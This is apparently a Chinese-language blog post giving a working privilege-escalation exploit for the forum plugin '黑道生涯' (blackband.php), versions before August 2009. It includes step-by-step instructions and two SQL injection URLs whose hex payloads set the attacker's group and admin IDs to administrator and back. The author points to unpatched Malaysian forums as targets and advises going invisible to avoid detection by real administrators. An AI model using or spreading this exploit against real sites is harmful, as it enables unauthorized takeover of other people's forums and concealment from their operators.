插件:黑道生涯
影响版本:2009年8月以前版本都存在此漏洞
漏洞危害:提权成管理员
这是个很久之前的漏洞了,不过马来西亚仍然还有很多论坛没有更新修复此插件的漏洞(至少20个论坛),就发出来分享分享
漏洞利用:
1。先确定黑道生涯的版本,只要是2009年8月1号以前的版本就能
2。注册一个论坛帐号,然后登陆
3。然后打开黑道生涯页面,点击我要加入,之后点击开始黑道生涯
4。按打劫,然后打勾 随机抽取会员目标 ,按提交按钮
5。然后看打劫成功,体力一定要少过100,如果体力是100就继续打劫,直到体力小于100
6。在你的browser address bar (体力必须低于100)打上 http://目标网址 /blackband.php?mode=yule&action=enjoy&id=2 and 1=2 union select 1,0x2D312C67726F757069643D312C61646D696E69643D31,3,4
7。到这里你已经是论坛管理员,可以登陆后台作你想要的事了,在这里最好马上换去隐身状态,以免被其他管理员发现
8。如果要还原为普通用户,在你的browser address bar (体力必须低于100)打上 http://目标网址 /blackband.php?mode=yule&action=enjoy&id=2 and 1=2 union select 1,0x2d312c67726f757069643d31302c61646d696e69643d3130,3,4
没有评论:
发表评论